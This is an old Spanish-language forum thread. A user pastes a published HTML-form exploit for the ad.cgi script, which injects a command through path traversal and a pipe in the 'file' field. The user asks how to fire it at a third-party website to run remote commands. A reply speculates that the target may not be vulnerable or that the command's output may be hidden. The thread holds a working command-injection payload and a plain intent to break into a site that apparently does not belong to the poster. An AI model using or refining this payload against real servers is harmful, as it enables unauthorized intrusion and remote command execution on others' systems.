Resultados 1 al 2 de 2

¿Como aplico un exploit para el script ad.cgi?

Vista híbrida

Mensaje anterior Mensaje anterior   Próximo mensaje Próximo mensaje
  1. #1 ¿Como aplico un exploit para el script ad.cgi? 
    Iniciado
    Fecha de ingreso
    Sep 2003
    Mensajes
    1
    Descargas
    0
    Uploads
    0
    He encontrado una dirección con la vulnerabilidad ad.cgi, que según parece permite a un intruso ejecutar comandos remotos.
    Tambien tengo (creo), el exploit, para aplicarlo, pero no sé como debo hacerlo, y estoy deseando poder aprender.
    Según pone en la página
    http://www.securityfocus.com/bid/2103
    el exploit es este:

    <html>
    <form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
    <h1>ad.cgi exploit</h1>
    Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
    <input type=submit value=run>
    </form>
    </html>

    Ahora bien, ¿Que hago con el?
    Lo he ejecutado como html, sustituyendo www.conservatives.net/someplace/ad.cgi
    por www.webdelfallo.com/ad.cgi y no consigo nada más que me responda 404 error.
    ¿Cómo se aplica el exploit para poder ejecutar comandos?
    Saluditos.
    Citar  
     

  2. #2  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    esto parece bien simple...lo k io creo es k la pagina no es vulnerable o bien tmb podria ser que escribieras mal agun dato en el exploit, por otro lado tmb seria interesante saber si es k puedes ver el resultado por el navegador, por k es posible k tu ejecutes ese comando (ping) pero k no lo veas.
    Citar  
     

Temas similares

  1. ¿Qué es y cómo funciona un Exploit?
    Por LUK en el foro NOTICIAS
    Respuestas: 1
    Último mensaje: 27-01-2017, 20:26
  2. ¿Cómo usar este exploit?
    Por Haroldaa en el foro INTRUSION
    Respuestas: 4
    Último mensaje: 14-06-2009, 23:35
  3. script para nautilus-scripts
    Por Cypress en el foro GENERAL
    Respuestas: 3
    Último mensaje: 24-04-2008, 16:22
  4. Script para manejo automático
    Por welvis30 en el foro PROGRAMACION WEB
    Respuestas: 9
    Último mensaje: 30-03-2008, 05:45
  5. Exploit para el SO FreeBSD 4.4?
    Por Anduriell en el foro VULNERABILIDADES
    Respuestas: 2
    Último mensaje: 16-02-2006, 22:55

Marcadores

Marcadores